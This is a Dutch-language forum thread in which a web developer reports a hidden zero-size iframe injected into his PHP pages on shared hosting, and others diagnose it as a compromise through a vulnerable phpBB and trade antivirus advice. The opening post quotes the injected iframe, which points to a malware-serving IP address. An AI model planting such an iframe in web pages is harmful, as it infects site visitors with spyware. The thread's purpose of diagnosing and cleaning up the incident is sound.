Hallo,

Ik heb het volgende erg vervelende en erg rare probleem.
Aan een indexpagina (index.php) van een website is in de sourcecode het volgende toegevoegt:



<iframe src="http://69.50.190.135/?to=OUT25&from=host1" width=0 height=0 frameborder=no></iframe>


(ip adres staat bekend om erg ranzige spyware)

Dit staat hardcoded in de broncode van het PHP script.
Het bestand heeft geen aangepaste rechten (chmod).
In mijn FTP client zie ik dat de laatst modified datum op gisteren staat, terwijl het weken geleden is dat dit script door mij is aangepast. Buiten mij heeft niemand FTP toegang tot deze website.

Hoe kan dit gebeuren? Brakke beveiliging op de server zelf? Andere websites op deze server hebben het probleem niet.

Ik heb het al eens eerder bij andere gezien..
Volgens mij is het spyware/virus op de pc van de client die gewoon die bestanden doorzoekt en het toevoegt.

kun je in je server log niets terugvinden hierover... lijkt me stug.

wellicht standaard software draaien die niet volledig gepached was?

Ik heb het al eens eerder bij andere gezien..
Volgens mij is het spyware/virus op de pc van de client die gewoon die bestanden doorzoekt en het toevoegt.


Het staat in de broncode van het script.
Inmiddels op twee andere websites ontdekt. Brakke server bij de hoster dus. :(

Origineel geplaatst door V. Kleijnendors


Het staat in de broncode van het script.
Inmiddels op twee andere websites ontdekt. Brakke server bij de hoster dus. :(

Ik bedoel dus de client die de bestanden upload...
Het is niks op de server, het is de webmaster zeg maar..

Zoals in mijn startpost al staat; het is een website van mij. De laatste wijziging heeft weken geleden plaats gevonden. Toch staat de last-modified datum in mijn FTP client op gisteren.

De website van mijn webhoster heeft het ook(!). 4 andere websites van mij ook. (een paar uur geleden nog niet).

Ik heb geen spyware of virus hier. Ook vanaf andere PC's wordt de iframe ingeladen. Check www.webcreators.nl maar eens (de broncode van een willekeurige pagina).

Is het anders een Windows server?

Nope, Redhat Linux

Heb zoiets een tijdje geleden ook eens gehoord.. Geloof dat het toen met phpbb te maken had... niet zeker van..

Ik weet niet wat voor andere websites op deze servers staan; het is shared hosting.

Het lijkt op meerdere servers voor te komen.
Met Google vind ik zo gauw niets wat op een worm duidt. :(

Als je toegang heb tot de kale logfiles dan zou je kunnen kijken of er iets geks gebeurt is rond de tijd waarop het bestand aangepast is.
Zo niet, dan kan je hoster dat misschien?

Er draait op die server een brakke phpBB

http://www.phpbb.com/phpBB/viewtopic.php?t=241300&postdays=0&postorder=asc&highlight=190+135&start=1155

Dat topic staat ook een voorbeeld van mensen die er last van hebben, misschien de host adviseren om mod_secure te installen

klote internet

sorry dubbel post

Origineel geplaatst door MaffeMuis
klote internet

sorry dubbel post
Moeilijk he, zo'n browser :)

Beveiligingsproblemen met scripts komen wel vaker voor..
http://www.geeklog.net/forum/viewtopic.php?showtopic=50236&lastpost=true

Origineel geplaatst door crazycoder

Moeilijk he, zo'n browser :)

[/url]

me internet hikte, me webradio werdt er zelfs stil van...

Er moet gewoon bijna een verbod op gaan komen op phpBB
niks anders dan bugjes. Elke x als ik een nieuwe phpBB op me servers zie komen, heb ik steeds meer medelijden met mijn servers... want je weet gewoon dat er weer een fucking bug in zit, en mensen niet weten dat ze moeten update of willen update. en jij als server beheerder loop maar gaten dicht te metselen van andere mensen...

Mijn mod_secure zie ik niks anders dan meldingen van blokkades.
machtig tooltje dat :) Maar je moet goed je rule-set in de gaten houden

GVD!
Had ik net 2 dagen AntiSpyware geupdate, en dacht dat hij wel klaar was... Nee dus (nieuw versie, dus moet eerst geconfigged worden)... krijg opeens 6 meldingen van Trojans die opeens via die site op mijn PC komen. WEES DUS ZEKER DAT JE ANTISPYWARE WERKT VOORDAT JE OP DIE LINK KLIKT.

Ff een waarschuwing :p

Origineel geplaatst door frvge
GVD!
Had ik net 2 dagen AntiSpyware geupdate, en dacht dat hij wel klaar was... Nee dus (nieuw versie, dus moet eerst geconfigged worden)... krijg opeens 6 meldingen van Trojans die opeens via die site op mijn PC komen. WEES DUS ZEKER DAT JE ANTISPYWARE WERKT VOORDAT JE OP DIE LINK KLIKT.

Ff een waarschuwing :p

Of gewoon geen Internet Exploder gebruiken
;)

Origineel geplaatst door Triloxigen


Of gewoon geen Internet Exploder gebruiken
;)

Ik opende hem in Kladblok & kreeg nog viruswaarschuwingen :)

Ik word echt doodmoe van deze webhoster. Betaal je meer dan €100 per maand voor een beetje shared webhosting. Tegelijkertijd zie je bijna al je pagina's leuk bewerkt worden. :(

Je zou toch mogen verwachten dat het een en ander een beetje beveiligd wordt.

Origineel geplaatst door V. Kleijnendors
Ik word echt doodmoe van deze webhoster. Betaal je meer dan €100 per maand voor een beetje shared webhosting. Tegelijkertijd zie je bijna al je pagina's leuk bewerkt worden. :(

Je zou toch mogen verwachten dat het een en ander een beetje beveiligd wordt.
Werken ze zelfs je pagina's bij is het nog niet goed :)

Ben je er zeker van dat er niet een lek zit in iets wat jij zelf gebruik? phpmyadmin oid??

Origineel geplaatst door crazycoder

Werken ze zelfs je pagina's bij is het nog niet goed :)

Ben je er zeker van dat er niet een lek zit in iets wat jij zelf gebruik? phpmyadmin oid??

PHPmyadmin staat op de servers door DirectAdmin, ik heb geen toegang tot de source.

Ik gebruik geen brakke software, ik weet wat ik schrijf.

Origineel geplaatst door V. Kleijnendors
Ik word echt doodmoe van deze webhoster. Betaal je meer dan €100 per maand voor een beetje shared webhosting. Tegelijkertijd zie je bijna al je pagina's leuk bewerkt worden. :(

Je zou toch mogen verwachten dat het een en ander een beetje beveiligd wordt.


€100 -> neeem een dedicated server zou ik zeggen, geen last meer van 'shared'-gedoe.

Origineel geplaatst door blaaat



€100 -> neeem een dedicated server zou ik zeggen, geen last meer van 'shared'-gedoe.

Zit al een beetje te kijken op de website van Dell. Ik ga eens kijken naar de mogelijkheden voor een managed colocated server. Ik zag altijd op tegen het verhuizen van domeinnamen, scripts en databases, maar nu is de maat vol. Dan maar een dagje (of 2) vrijmaken.

Origineel geplaatst door V. Kleijnendors
PHPmyadmin staat op de servers door DirectAdmin, ik heb geen toegang tot de source.

Ik gebruik geen brakke software, ik weet wat ik schrijf.
Jij schreef dat andere sites bij dezelfde hoster hetzelfde probleem vertonen.. dan zou er wel eens een factor kunnen zijn die deze sites delen..
Daarbij zat ik nog niet onmiddelijk te denken aan wat jij zelf heb geschreven..

Jij schreef dat andere sites bij dezelfde hoster hetzelfde probleem vertonen.. dan zou er wel eens een factor kunnen zijn die deze sites delen..
Daarbij zat ik nog niet onmiddelijk te denken aan wat jij zelf heb geschreven..

Ik ben php scripter van beroep en weet zeker dat dit niet komt door code van mijn hand. Het lijkt me voor de hand liggend dat het ligt aan brakke open-source software zoals phpBB. Ik weet niet hoeveel sites op de twee geïnfecteerde servers staan.

Daarnaast vind ik dat in een shared (kwaliteits) omgeving een lek in een brak script (op één account) niet heel de server mag infecteren. Dat zelfs de website van de webhoster zelf is geïnfecteerd zegt mij genoeg.

Dan kan beter voor een dedicated gaan. Goedkoper (op termijn wel duurder, maar je hebt minder hardware zorgen) en je kan toch alles doen wat je wilt.

Spyware eraf gelukkig :)

Een belangrijk punt : openbase_dir :)

Als dit aan had gestaan was dit waarschijnlijk niet gebeurd. Nu is er ergens op die server een account gehacked en zit dat "hakkertje" vrolijk alle index.htm/html/php te herschrijven door er een miniscuul iframe-je in te schrijven.

Errug vervelend, ook voor je bezoekers die hun AV minder goed op orde hebben, mijn BitDefender sloeg meteen groot alarm :)

Ik zou asap je server beheerder informeren en overwegen je sites te verhuizen (of een eigen server te nemen zoals al is voorgesteld)

let wel op dat bij een eigen server mee komt kijken dan dat je denkt...
zet voordat je hier aan begint, een klein testbakje op thuis....en speel hier eens 2 weken mee... zonde om meteen een back aan te schaffen, en er de eerste paar weken niks van snappen...

Origineel geplaatst door MaffeMuis
let wel op dat bij een eigen server mee komt kijken dan dat je denkt...
zet voordat je hier aan begint, een klein testbakje op thuis....en speel hier eens 2 weken mee... zonde om meteen een back aan te schaffen, en er de eerste paar weken niks van snappen...

Hij is op zoek naar een managed colocated server, dus dat gaat niet echt op.. iemand anders heeft er al voor hem mee gespeelt.

Sorry voor het email-spammen trouwens :p ... Tiscali heeft net gemaild dat ik over 2 dagen wordt afgesloten indien het doorgaat... rottrojans die niet gevonden/opgeruimd worden door AntiSpyware :S

Origineel geplaatst door frvge
Sorry voor het email-spammen trouwens :p ... Tiscali heeft net gemaild dat ik over 2 dagen wordt afgesloten indien het doorgaat... rottrojans die niet gevonden/opgeruimd worden door AntiSpyware :S
En daar lach je ook zelf nog om?

Vind 2 dagen veel te lang!

Trouwens m$ antispyware ziet bijna niets.
Als je toch zo nodig iets moet gebruiken om te scannen, gebruik dan tenminste www.symantec.com en kies voor "security check" en vervolgens voor antivirus.

Beste oplossing: bak offine, reinstall, alle patches en niet meer met administrator rechten op je windhoos. Wil je toch met ie browsen zet dat onding dan zo veilig mogelijk.

Leve Firefox en MS AntiSpyware schijnt een van de beste te zijn. Symantec is een resource hogger (gebruik BitDefender8 nu)

Ga nu formatteren enz.

Origineel geplaatst door frvge
Leve Firefox en MS AntiSpyware schijnt een van de beste te zijn. Symantec is een resource hogger (gebruik BitDefender8 nu)

Ga nu formatteren enz.
Heb voor de gein het een keer gebruikt op de pc van een klant.. ms vond niets, symantec online scanner pikte ze er zo uit :)

Tjsa, maar hij kan dan wel niks verwijderen, toch... maar daar heb je internet dan weer voor.

Origineel geplaatst door frvge
Leve Firefox en MS AntiSpyware schijnt een van de beste te zijn. Symantec is een resource hogger (gebruik BitDefender8 nu)

Ga nu formatteren enz.

Antispyware zit pas in BitDefender 9 (versie Internet Security), ik zou het dus daarmee even proberen.

Ik bedoel dat ik Microsoft AntiSpyware gebruik in combinatie met BD8 (=virus scanner). IIg bedankt voor die tip, dan wordt BD9 mijn nieuwe versie.

Origineel geplaatst door frvge
Tjsa, maar hij kan dan wel niks verwijderen, toch... maar daar heb je internet dan weer voor.
Als je weet dat er iets zit en waar het zit kan je het altijd via veilige modus verwijderen.

Beste oplossing is natuurlijk om het ding opnieuw te installeren. Je bent er anders nooit zeker van of de pc (of server) wel helemaal schoon is.

gebruik hitman pro om al je spyware kwijt te raken, is een soort van gratis toolkit van alle bekende anti-spyware software, waaronder spybot s&d, ad-aware etc. Dit pakket vind alles en is in bijna alle gevallen in staat om het te verwijderen, programma is in het nederlands beschikbaar, draiit nette rapportjes uit en werkt zeer goed, downloaden kan vanaf:
http://www.hitmanpro.nl/
en ben je echt tevreden maak even een donatie over aan die gast